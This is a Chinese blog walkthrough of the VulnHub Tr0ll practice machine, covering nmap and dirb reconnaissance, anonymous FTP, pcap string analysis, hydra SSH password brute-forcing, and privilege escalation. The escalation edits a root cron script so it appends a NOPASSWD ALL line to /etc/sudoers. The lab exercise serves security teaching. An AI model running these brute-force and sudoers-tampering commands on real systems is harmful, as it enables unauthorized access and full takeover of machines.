Troll打靶思路详解(vulnhub)

最新推荐文章于 2024-03-02 17:01:02 发布
最新推荐文章于 2024-03-02 17:01:02 发布
阅读量1.6k 收藏 29
点赞数 37
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MCcming/article/details/136380159
版权

Troll打靶思路详解(vulnhub)

第一步:信息收集–主机发现和端口扫描

使用nmap快速对局域网进行扫描来确定靶机IP

nmap -sn 192.168.31.0/24

确定靶机IP为192.168.31.69

再次使用nmap对靶机IP进行详细扫描

nmap -p- -sV -sT -O 192.168.31.69

结果如下

在这里插入图片描述

可以看到靶机开放了21,22,80这3个端口

首先对80端口所开放的web服务进行信息收集

查看web服务访问http://192.168.31.69/

在这里插入图片描述

通过dirb进行目录扫描

dirb http://192.168.31.69/

结果如下

在这里插入图片描述

访问http://192.168.31.69/secret/index.html

在这里插入图片描述

感觉又被嘲讽了

然后对21端口所开放的ftp服务进行信息收集

通过ftp 192.168.31.69命令来访问

我尝试使用root用户进行登入结果如下

在这里插入图片描述

可以看到仅支持anonymous(匿名用户)进行登入

所以我们通过用户名为anonymous密码为空进行登入

然后通过ls命令来查看里面的内容

在这里插入图片描述

最后对22端口所开放的ssh服务进行信息收集

使用Hydra进行弱口令爆破

hydra -L user.txt -P CommonWebAdminPass.txt -t 2 -vV -e ns 192.168.31.69 ssh

通过结果发现短时间内只能尝试3个账号的登录

第二步:数据分析–对FTP中的数据包进行分析

首先我们将数据包文件下载下来

get lol.pcap

在这里插入图片描述

然后我们通过wireshark打开lol.pcap文件可以看出为ftp的传输报文

通过 strings lol.pcap 来搜索文件里所包含的字符串

在这里插入图片描述

重点为

Well, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P
Sucks, you were so close... gotta TRY HARDER!

翻译:
好吧,好吧,好吧,你不就是一个聪明的小恶魔吗,你差点找到了 sup3rs3cr3tdirlol :-P
糟透了,你离得太近了......必须更加努力!

可以看到”sup3rs3cr3tdirlol :-P“是无法翻译的

第三步:WEB渗透–获取关于账号密码的信息

我们现在有ssh服务和web服务没有找到突破点,这个字符串不像用户名密码

所以我尝试访问http://192.168.31.69/sup3rs3cr3tdirlol

在这里插入图片描述

我们通过wget命令下载下来

wget http://192.168.31.69/sup3rs3cr3tdirlol/roflmao

还是通过strings命令来找文件中包含的字符串

strings roflmao

在这里插入图片描述

反复查看后感觉重点为

Find address 0x0856BF to proceed

翻译:
查找地址0x0856BF以继续

所以我们访问http://192.168.31.69/0x0856BF/

在这里插入图片描述

然后我们通过wget命令分别将其中内容下载下来

wget http://192.168.31.69/0x0856BF/good_luck/which_one_lol.txt

wget http://192.168.31.69/0x0856BF/this_folder_contains_the_password/Pass.txt

查看

在这里插入图片描述

第四步:后渗透–SSH登入与提权

ssh登入

刚刚我们信息收集已知短时间内只能尝试3个账号的登录

所以我们将用户名分为多个文件,每个文件分别有3个用户名

然后使用Hydra进行爆破

hydra -L user1.txt -P Pass.txt -t 2 -vV -e ns 192.168.31.69 ssh

hydra -L user2.txt -P Pass.txt -t 2 -vV -e ns 192.168.31.69 ssh

hydra -L user3.txt -P Pass.txt -t 2 -vV -e ns 192.168.31.69 ssh

hydra -L user4.txt -P Pass.txt -t 2 -vV -e ns 192.168.31.69 ssh

结果发现没有一个用户名能够使用密码“Good_job_😃”登录

可能Pass.txt文件名本身就是密码

因此我们再尝试用Pass.txt作为密码进行爆破

hydra -L user4.txt -P Pass.txt -t 2 -vV -e ns 192.168.31.69 ssh

在这里插入图片描述

可知账号为overflow 密码为Pass.txt

登入:ssh overflow@192.168.31.69 

增加shell的交互性:python -c "import pty;pty.spawn('/bin/bash')"

提权

查看当前用户的权限:sudo -l

在这里插入图片描述

发现突然被踢出了会话,猜测是有定时任务

查看:cat /etc/crontab

在这里插入图片描述

权限不被允许,无法查看。那就使用find命令查找定时任务相关的日志cronlog

find / -name cronlog 2>/dev/null

在这里插入图片描述

找到了查看文件

cat /var/log/cronlog

在这里插入图片描述

关键信息来了!这里有一个定时任务,会每两分钟运行一个名为cleaner.py的文件。我们搜索cleaner.py文件

find / -name cleaner.py 2>/dev/null

在这里插入图片描述

找到了查看文件

cat /lib/log/cleaner.py

在这里插入图片描述

这个文件通过os.system函数执行系统命令,对目录/tmp的删除,那么我们只要把os.system()中的参数修改为:

echo "overflow ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers

我们通过vim进行编辑更改,再通过”:wq!"保存退出

在这里插入图片描述

等待最多两分钟后,再次运行sudo -l,即可发现overflow的用户变为了最高权限:

在这里插入图片描述

然后运行sudo /bin/bash即可拿到root的bash:

在这里插入图片描述

进入/root目录拿flag:

在这里插入图片描述

至此完结,撒花。

MCcming
关注
  • 37
    点赞
  • 29
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Tr0ll:1靶机-Walkthrough
ins1ght的博客
09-14 2200
Tr0ll:1靶机,比较基础,提供了2种思路和5种提权方法。
vulnhub靶场- Tr0ll靶场
zzzzzzkeai的博客
11-27 702
vulnhub靶场--Tr0ll:1靶场
Tr0ll2 vulnhub靶场(缓冲区溢出)
weixin_62621015的博客
03-12 789
Tr0ll2 vulnhub靶场(缓冲区溢出漏洞)
【靶机渗透】——VulnHub-trollcave
Kris__zhang的博客
06-16 912
](https://img-blog.csdnimg.cn/20200616100625202.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0tyaXNfX3poYW5n,size_16,color_FFFFFF,t_70)
红队打靶Troll1打靶思路详解vulnhub
Bossfrank的博客
07-06 685
本文是vulnhub靶机Troll的详细打靶过程。涉及到的知识点包括FTP匿名登录、strings命令、密码喷射crackmapexec、定时任务提权等。靶机本身不复杂,但关键是有一些命令的操作。包括strings查看文件的文本信息、binwalk查看捆绑文件、file命令查看文件信息。如果不使用这些命令,可能会遗漏很多重要信息。
GUI.rar_Troll_qt commercial
09-19
**Qt图形界面框架详解** Qt,源自挪威Troll Tech公司的创新之作,是一个强大的跨平台C++图形用户界面(GUI)工具包。它以其卓越的性能、丰富的功能和易用性在开发者社区中广受赞誉。Qt支持多种操作系统,如Windows...
Troll Bait
10-28
Troll Bait
troll-开源
05-01
troll(例如patchDownload)是一种自动代理,可以出于安全考虑对系统进行修补。 获取可用补丁列表与已安装的比较检查完整性安装那些可以并且不要破坏依赖关系的文件
Text Troll-crx插件
04-06
**Text Troll-crx插件详解** Text Troll-crx是一款针对西班牙语用户设计的浏览器扩展程序。该插件的主要功能是对特定的词汇进行自动替换,从而为用户提供一种个性化和娱乐化的网络浏览体验。从描述中我们可以看出,...
Troll:在朋友计算机上开个玩笑
05-15
标题中的"Troll"在这里指的是一个恶作剧或者玩笑,而这个项目显然与在朋友的计算机上执行这样的玩笑有关。描述简单地提到了“巨魔”(可能是网络用语,指开恶作剧的人)和对Python 3的依赖。标签包括了"python"、...
trollcave靶场深度总结需要掌握的知识
技术超强的网络安全平台
12-11 827
Linux上传文件时也可以任意的…/这样并不影响 也就是说…/可以非常多到达/目录,跟Windows一样 解决不能shell上传文件的问题 1、gcc xxx.c -o xxx编译一个c文件,也就相当于是exe 2、base64 xxx 切记xxx后面一定要有一个空格 3、复制黏贴后,在shell 中运行vim rr.64 复制内容上去 4、后面直接base64 -d rr.64 > rr就可以了 生成ssh秘钥 ssh-keygen -f rails 其中rails为用户名 mv rails.pub
trollcave靶机渗透测试
weixin_49340699的博客
06-28 375
trollcave靶机渗透测试环境工具流程 环境 kali攻击机 IP:192.168.1.105 靶机 IP:192.168.1.103 工具 ssh netdiscover nmap dirb python nc searchsploit 流程 netdiscover对目标网段进行扫描主机发现 namp -sV 192.168.1.103 对端口进行扫描 发现开启了80端口和22端口 dirb对80端口进行目录爆破 扫出来的url都是跳转到一个登陆页面 回到主页发现有一篇关于密码重置的博客 在博
[渗透测试实战]vulnhub靶场1 初步掌握渗透流程(详细步骤)
知识库总结、分享
07-01 1504
Fuzzing可以帮助发现那些常规的安全测试无法发现的漏洞和弱点,因为它可以测试系统的响应能力,以及处理异常数据的能力。目前已知系统提供的服务ssh和http,web用的是WordPress cms系统,渗透系统希望获得用户和密码,访问WordPress看能不能得到账户信息。拿到正确参数,需要传入参数访问url拿到系统信息,参数file是文件的意思,第一想到的是拿到系统的账户文件/etc/passwd,继续传参数访问。不报gcc相关的错误了,也算解决了一个问题,又出现了程序执行权限问题,真是大肠包小肠!
渗透项目(四):Tr0ll
Ays.Ie的博客
10-27 1411
本文记录作者第4个渗透项目,希望对渗透感兴趣的同学有所帮助,随后还会更新一些其他工具使用的文章
OSCP练习:vulhub靶机TR0LL 2攻略
weixin_47311099的博客
04-22 4341
信息收集 主机发现 先用namp做个扫描 在这里插入图片描述 发现21ftp、22ssh、80http 网站信息收集 访问web页面,跟上一关一样没啥东西 爆一下网站目录 发现robots文件中告诉我们一些路径,将其保存当作dirb字典在进行爆破 果然又发现了几个路径,但是所有页面都是同一个图…以及一句话… 但是!当我们把图片下载下来,算一下MD5就会发现/dont_bother里的图片MD5跟其他的不一样! 看一眼图片二进制发现重要信息,y0ur_self会是突破电 strings cat_t
Troll2打靶思路详解vulnhub
最新发布
MCcming的博客
03-02 1617
还是尝试用Hydra进行弱口令爆破并没有什么发现。
2023/4/24
weixin_43643216的博客
04-24 230
1. 将TCP的select服务器重新写一遍。3. 将TCP的select客户端写一遍。2. 将TCP的poll客户端写一遍。
redis主从复制详解
逆流而上的博客
01-14 7812
redis主从复制实现 方式一、新增一个配置文件端口6380,加入 slaveof 192.168.31.69 6379, 在6379启动完后再启6380,完成配置; 方式二、新增一个配置文件端口6380,redis-server --slaveof 192.168.31.69 6379 需要注意的几点: 配置文件里面的 bind 本来是127.0.0.1 需要修改为服务器ip 用redis-...
vulnhub靶机Tr0ll渗透笔记
liver100day的博客
06-08 760
Tr0ll靶机渗透笔记 靶机环境搭建 攻击渗透机: kali IP地址:192.168.75.128 靶机:Tr0ll IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/tr0ll-1,100/ 渗透过程 1.信息收集 1.1 主机发现 arp-scan -l 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息) 1.2 端口扫描(masscan或nmap) messcan --rate=100000 -p 0-65535 192.168.75.147
C++编程 一个游戏中有多种怪物(Monster)。怪物之间可能要发生战斗(fight),每场战斗都是一个怪物与另一怪物之间的一对一战斗。每个怪物都有自己的生命值(hitpoint)、攻击力值(damage)和防御力值(defense),每种怪物都有各自特有的攻击(attack)方式,产生相应的攻击效果:战斗时,两个怪物依次攻击对方,即怪物a 首先攻击怪物b,然后轮到怪物b攻击怪物a,之后,怪物a 再次攻击怪物b,⋯⋯,直到一方生命值为0。   请根据你对上述描述的理解,定义并实现怪物类Monster,成员的设计可以任意,但要求该类至少有一个不带virtual修饰的成员函数fight,用来描述与另外一个怪物进行战斗的过程,该函数的实现可为Monster类的任意派生类所复用(派生类不需重新定义及实现)。不必考虑怪物的生命值减少至0后如何处理。
06-12
好的,根据你的要求,我来为你实现怪物类Monster。 首先,我们可以定义一个Monster类,包含hitpoint、damage、defense和attack等成员变量和函数。其中,attack函数可以用虚函数来定义,以便在派生类中实现不同的攻击方式。 ```c++ class Monster { public: Monster(int hp, int dmg, int def) : hitpoint(hp), damage(dmg), defense(def) {} virtual void attack(Monster& enemy) {} void fight(Monster& enemy) { while (hitpoint > 0 && enemy.hitpoint > 0) { attack(enemy); if (enemy.hitpoint <= 0) break; enemy.attack(*this); } } private: int hitpoint; int damage; int defense; }; ``` 在这里,我们定义了一个Monster类,它有三个私有成员变量:hitpoint、damage和defense,表示怪物的生命值、攻击力和防御力。另外,我们定义了一个不带virtual修饰的成员函数fight,用来描述与另一个怪物进行战斗的过程。在fight函数中,我们通过调用attack函数来模拟战斗,直到其中一个怪物的生命值降为0。 接下来,我们可以派生出一些具体的怪物类,并实现它们的攻击方式,例如: ```c++ class Goblin : public Monster { public: Goblin() : Monster(50, 10, 5) {} void attack(Monster& enemy) { int damage = this->damage - enemy.defense; if (damage > 0) { enemy.hitpoint -= damage; } } }; class Troll : public Monster { public: Troll() : Monster(100, 20, 10) {} void attack(Monster& enemy) { int damage = this->damage - enemy.defense; if (damage > 0) { enemy.hitpoint -= damage; this->hitpoint += damage / 2; // Troll can heal itself } } }; ``` 在这里,我们派生出了Goblin和Troll两个具体的怪物类,并实现了它们各自的攻击方式。Goblin的攻击方式是直接减去敌人的防御力,并造成相应的伤害;而Troll的攻击方式除了减去敌人的防御力外,还会使自己恢复一部分生命值。 最后,我们可以使用这些怪物类来进行战斗,例如: ```c++ int main() { Goblin goblin; Troll troll; goblin.fight(troll); return 0; } ``` 在这个例子中,我们创建了一个Goblin对象和一个Troll对象,并让它们进行战斗。由于我们在Monster类中定义了通用的战斗方式,因此我们可以直接调用fight函数进行战斗,而不用考虑具体的攻击方式。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值